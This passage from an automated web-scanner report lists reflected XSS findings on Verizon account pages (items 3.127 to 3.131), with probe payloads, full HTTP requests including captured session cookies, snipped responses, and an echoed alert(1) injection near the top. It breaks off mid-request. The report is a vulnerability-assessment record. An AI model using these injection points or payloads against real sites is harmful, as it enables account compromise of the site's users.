Date: Sat, 20 Nov 2010 02:33:33 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=Z%2bMP4OJFy5%2fqmvWNgdEqqq8jhZx46tHx; domain=.verizon.com; path=/


<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...
<!--.net shutdown -->
           
               locationHref = locationHref + "&Client=" + "MYVERb116d";alert(1)//c8e1f41e796"
           

           location.href = locationHref + catHref;
           var appname = navigator.appName;
           if(appname != "Netscape")
           {
           
            var tempHTML = document.getElementById(Ctrl1).innerHTML;
       
...[SNIP]...

3.127. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/MyAccount/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa60"%3bf05a0d1a8b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfa60";f05a0d1a8b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/MyAccount/?cfa60"%3bf05a0d1a8b6=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:48:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128914

<!-- Vignette V6 Fri Nov 19 18:48:53 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
cument.cookie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/MyAccount/?cfa60";f05a0d1a8b6=1';
<!-- Vignette V6 Fri Nov 19 18:48:53 2010 -->
...[SNIP]...

3.128. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/billview/PfbPage.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9f30"%3b3e7ac830269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9f30";3e7ac830269 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/billview/PfbPage.aspx?d9f30"%3b3e7ac830269=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSQCTQBBS=AFAADPNBHJKOMNEGALNHDACA; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 128949

<!-- Vignette V6 Fri Nov 19 18:47:43 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
ie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/billview/PfbPage.aspx?d9f30";3e7ac830269=1';
<!-- Vignette V6 Fri Nov 19 18:47:43 2010 -->
...[SNIP]...

3.129. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/myaccount/Main/MyAccount.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbeb"%3b928f0315c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dbeb";928f0315c8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/myaccount/Main/MyAccount.aspx?1dbeb"%3b928f0315c8d=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128975

<!-- Vignette V6 Fri Nov 19 18:49:44 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
Com=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx?1dbeb";928f0315c8d=1';
<!-- Vignette V6 Fri Nov 19 18:49:44 2010 -->
...[SNIP]...

3.130. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The value of the Target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a525"%3b6c5402aa620 was submitted in the Target parameter. This input was echoed as 6a525";6c5402aa620 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?Target=6a525"%3b6c5402aa620 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:43:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=DGDMJDFBHBIOMKNLOAIKOOMO; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128927

<!-- Vignette V6 Fri Nov 19 18:43:11 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?Target=6a525";6c5402aa620';
<!-- Vignette V6 Fri Nov 19 18:43:11 2010 -->
...[SNIP]...

3.131. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcc6f"%3b98476cbd401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fcc6f";98476cbd401 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?fcc6f"%3b98476cbd401=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
